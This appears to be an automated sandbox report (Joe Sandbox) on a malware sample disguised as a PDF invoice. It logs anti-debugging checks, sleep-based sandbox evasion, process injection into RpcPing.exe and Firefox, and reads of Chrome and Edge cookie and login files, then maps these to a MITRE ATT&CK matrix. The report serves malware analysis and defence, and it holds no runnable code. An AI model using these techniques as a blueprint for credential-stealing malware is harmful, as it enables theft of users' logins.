Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\RpcPing.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\RpcPing.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\RpcPing.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\RpcPing.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\RpcPing.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\RpcPing.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\RpcPing.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\RpcPing.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Memory allocated: C50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Memory allocated: 2640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Memory allocated: C50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Memory allocated: 7A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Memory allocated: 8A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Memory allocated: 8C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Memory allocated: 9C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Memory allocated: 9FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Memory allocated: AFD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Memory allocated: BFD0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\RpcPing.exe	API coverage: 2.6 %

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe TID: 7296	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8020	Thread sleep count: 136 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8020	Thread sleep time: -272000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8020	Thread sleep count: 9836 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8020	Thread sleep time: -19672000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\RpcPing.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\RpcPing.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: NULL target: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Section loaded: NULL target: C:\Windows\SysWOW64\RpcPing.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: NULL target: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: NULL target: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Windows\SysWOW64\RpcPing.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	11 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	14 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Timestomp	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ORIGINAL INVOICE COAU7230734298.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
ORIGINAL INVOICE COAU7230734298.pdf.exe